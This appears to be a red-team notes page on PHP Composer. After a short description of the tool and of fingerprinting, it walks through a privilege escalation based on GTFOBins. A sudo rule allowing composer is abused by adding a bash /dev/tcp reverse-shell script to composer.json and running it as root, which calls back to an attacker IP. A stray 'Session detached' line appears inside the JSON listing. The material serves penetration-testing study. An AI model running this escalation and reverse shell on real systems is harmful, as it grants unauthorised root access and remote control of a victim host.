Composer

Composer is a dependency management tool for PHP that automates the installation, updating, and autoloading of external libraries used in a project. It allows developers to define project dependencies in a composer.json file and ensures consistent environments by resolving and installing compatible package versions. Composer fetches packages from Packagist.org, the default repository, and places them into the vendor/ directory, alongside an autoloader that integrates them into the application.

In the context of Red Team operations, Composer is a key indicator of a modern PHP project structure. The presence of a composer.lock or vendor/ folder helps fingerprint the application’s internal components and their versions. Misconfigured or exposed Composer files may leak sensitive metadata about the application’s framework, libraries, and potential vulnerable packages, aiding in targeted exploitation.

Custom scripts

Based on: GTFOBins and official documentation.

$ sudo -l
User x7331 may run the following commands on kali:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/laravel *
    
$ ls -la /var/www/html/laravel/composer.json
-rwxr-xr-x 1 x7331 x7331 1645 Sep 14  2023 /var/www/html/laravel/composer.json

$ cat composer.json
{!] Session detached ⇲
  "scripts": {
        "revshell": [
                "/usr/bin/bash -c \"/usr/bin/bash -i >& /dev/tcp/192.168.45.170/80 0>&1\""
        ]
   }
}

$ sudo /usr/bin/composer --working-dir\=/var/www/html/laravel run-script revshell
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Continue as root/super user [yes]? yes
> /usr/bin/bash -c "/usr/bin/bash -i >& /dev/tcp/192.168.45.170/80 0>&1"